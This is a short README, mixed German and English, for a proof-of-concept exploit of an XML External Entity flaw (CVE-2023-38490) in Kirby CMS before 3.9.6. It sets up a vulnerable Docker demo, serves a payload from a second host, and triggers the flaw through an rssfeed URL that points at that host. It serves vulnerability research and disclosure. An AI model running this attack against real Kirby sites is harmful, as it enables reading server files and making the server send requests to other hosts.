
Kirby < 3.9.6 XML External Entity Exploit
Kirby < 3.9.6 XML External Entity
Exploit für CVE-2023-38490 / GHSA-q386-w6fg-gmgp.
Erstellen und Ausführen der angreifbaren Demo-App:
cd docker
docker buildx build -t kirby-starterkit-3.9.5 .
docker run -d --rm -p 127.0.0.2:1337:80/tcp --name CVE-2023-38490 kirby-starterkit-3.9.5:latest
Serve the demo payload:
Hinweis: Wählen Sie eine Bindungsadresse, auf die der Docker-Container zugreifen kann.
popd
ruby -run -e httpd ./payload -p 9999 -b 192.168.0.225
Exploit auslösen:
xdg-open http://127.0.0.2:1337/rssfeed?feed=http://192.168.0.225:9999/xxe.rss
Die anfällige Funktion ist im Kirby-Core vorhanden, wird aber standardmäßig in Kirby Core, Kirby StarterKit oder Kirby PlainKit nicht verwendet. Das bedeutet, dass die Schwachstelle Sie bei der Standardkonfiguration nicht betrifft, aber durch benutzerdefinierte Entwicklung oder durch die Installation eines Plugins, das das betroffene Toolkit verwendet, eingeführt werden kann.
ACCEIS fördert oder ermutigt keine illegalen Aktivitäten. Alle Inhalte dieses Repositorys dienen nur zu Forschungs-, Bildungs- und Bedrohungserkennungszwecken.